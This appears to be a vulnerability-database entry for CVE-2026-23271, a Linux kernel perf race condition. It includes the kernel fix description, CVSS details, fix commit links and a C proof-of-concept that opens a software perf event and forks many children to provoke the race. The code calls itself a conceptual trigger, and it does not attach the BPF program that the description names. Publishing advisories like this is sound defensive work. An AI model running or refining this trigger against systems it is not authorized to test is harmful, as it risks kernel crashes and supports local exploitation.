Security Vulnerability Report
CVE-2026-23271 CVSS 7.8 HIGH

CVE-2026-23271

Published: 2026-03-20 09:16:12
Last Modified: 2026-04-02 15:16:28
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

perf: Fix __perf_event_overflow() vs perf_remove_from_context() race

Make sure that __perf_event_overflow() runs with IRQs disabled for all possible callchains. Specifically the software events can end up running it with only preemption disabled.

This opens up a race vs perf_event_exit_event() and friends that will go and free various things the overflow path expects to be present, like the BPF program.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Linux Kernel < Commit 3f89b61dd504c5b6711de9759e053b082f9abf12
Linux Kernel < Commit 4df1a45819e50993cb351682a6ae8e7ed2d233a0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * PoC for CVE-2026-23271
 * This is a conceptual trigger to demonstrate the race condition.
 * It attempts to trigger the overflow while exiting context.
 */
#include <linux/perf_event.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static long perf_event_open(struct perf_event_attr *hw_event, pid_t pid,
                            int cpu, int group_fd, unsigned long flags)
{
    return syscall(__NR_perf_event_open, hw_event, pid, cpu, group_fd, flags);
}

int main()
{
    struct perf_event_attr pe;
    int fd;

    memset(&pe, 0, sizeof(struct perf_event_attr));
    pe.type = PERF_TYPE_SOFTWARE;
    pe.size = sizeof(struct perf_event_attr);
    pe.config = PERF_COUNT_SW_TASK_CLOCK;
    // High frequency to trigger overflow faster
    pe.sample_freq = 1000;
    pe.disabled = 0;
    pe.enable_on_exec = 0;

    fd = perf_event_open(&pe, 0, -1, -1, 0);
    if (fd == -1) {
        perror("perf_event_open");
        exit(EXIT_FAILURE);
    }

    printf("Triggering race condition (CVE-2026-23271)...");
    fflush(stdout);

    // Fork threads to increase contention between overflow and exit
    for (int i = 0; i < 100; i++) {
        if (fork() == 0) {
            // Child process: busy wait to generate events and exit
            volatile int x = 0;
            while (x < 100000)
                x++;
            _exit(0);
        }
    }

    close(fd);
    return 0;
}

References

https://git.kernel.org/stable/c/3f89b61dd504c5b6711de9759e053b082f9abf12
https://git.kernel.org/stable/c/4df1a45819e50993cb351682a6ae8e7ed2d233a0
https://git.kernel.org/stable/c/4f8d5812337871227bb2c98669a87c306a2f86ef
https://git.kernel.org/stable/c/5c48fdc4b4623533d86e279f51531a7ba212eb87
https://git.kernel.org/stable/c/bb190628fe5f2a73ba762a9972ba16c5e895f73e
https://git.kernel.org/stable/c/c9bc1753b3cc41d0e01fbca7f035258b5f4db0ae